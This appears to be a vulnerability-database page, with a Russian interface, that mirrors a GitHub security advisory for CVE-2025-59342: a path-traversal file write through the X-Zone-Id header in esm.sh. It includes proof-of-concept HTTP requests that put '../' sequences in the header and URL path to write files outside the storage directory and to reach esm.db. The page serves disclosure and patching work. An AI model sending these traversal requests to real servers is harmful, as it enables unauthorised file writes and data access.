Логотип exploitDog
Консоль
Логотип exploitDog

exploitDog

github логотип

GHSA-g2h5-cvvr-7gmw

Опубликовано: 17 сент. 2025
Источник: github
Github: Прошло ревью
CVSS4: 5.5

Описание

esm.sh has arbitrary file write via path traversal in X-Zone-Id header

Summary

A path-traversal flaw in the handling of the X-Zone-Id HTTP header allows an attacker to cause the application to write files outside the intended storage location. The header value is used to build a filesystem path but is not properly canonicalized or restricted to the application’s storage base directory. As a result, supplying ../ sequences in X-Zone-Id causes files to be written to arbitrary directories (example observed: ~/.esmd/modules/transform/<id>/ instead of ~/.esmd/storage/modules/transform).

Severity: Medium

Component / Endpoint:

POST /transform — handling of X-Zone-Id header

The vulnerable code is in https://github.com/esm-dev/esm.sh/blob/main/server/router.go#L116 and https://github.com/esm-dev/esm.sh/blob/main/server/router.go#L411

Impact: Arbitrary file creation / overwrite outside intended storage directory (file write to attacker-controlled path). Possible remote code execution, persistence, tampering with application files, or facilitating further path-traversal attacks.

Proof of Concept (POC)

Request (attacker-supplied X-Zone-Id contains path traversal):

POST /transform HTTP/1.1 Host: localhost:8888 User-Agent: Den/8.7.1 Accept: */* Connection: keep-alive Referer: http://localhost:9999/ Content-Type: application/json X-Zone-Id: ../../modules/transform/c245626ef6ca0fd9ee37759c5fac606c6ec99daa/ Content-Length: 325 { "filename": "example2.js", "lang": "js", "code": "console.log('hello');", "importMap": { "imports": { "react": "https://esm.sh/react", "react-dom": "https://esm.sh/react-dom" } }, "jsxImportSource": "react", "target": "es2022", "sourceMap": "external", "minify": true }
Screenshot 2025-09-16 at 21 40 57

Observed result: file written to ~/.esmd/modules/transform/c245626ef6ca0fd9ee37759c5fac606c6ec99daa/example2.js instead of the intended ~/.esmd/storage/modules/transform/.

This can be trigger with another path traversal request below

GET /+c245626ef6ca0fd9ee37759c5fac606c6ec99daa./../../../esm.db?.css HTTP/1.1 Host: localhost:8888 User-Agent: localhost Accept: */* Connection: keep-alive X-Zone-Id: ../ Referer: http://localhost:9999/
Screenshot 2025-09-16 at 21 37 07

Remediation

Simply remove any .. in the X-Zone-Id header before actually process the file.

Credits

Ссылки

Пакеты

Наименование

github.com/esm-dev/esm.sh

go
Затронутые версииВерсия исправления

<= 136

136.1

EPSS

Процентиль: 74%
0.00825
Низкий

5.5 Medium

CVSS4

CVE ID

CVE-2025-59342

Дефекты

CWE-24

Связанные уязвимости

nvd логотип

CVE-2025-59342

nvd
5 месяцев назад

esm.sh is a nobuild content delivery network(CDN) for modern web development. In 136 and earlier, a path-traversal flaw in the handling of the X-Zone-Id HTTP header allows an attacker to cause the application to write files outside the intended storage location. The header value is used to build a filesystem path but is not properly canonicalized or restricted to the application’s storage base directory. As a result, supplying ../ sequences in X-Zone-Id causes files to be written to arbitrary directories. Version 136.1 contains a patch.

EPSS

Процентиль: 74%
0.00825
Низкий

5.5 Medium

CVSS4

CVE ID

CVE-2025-59342

Дефекты

CWE-24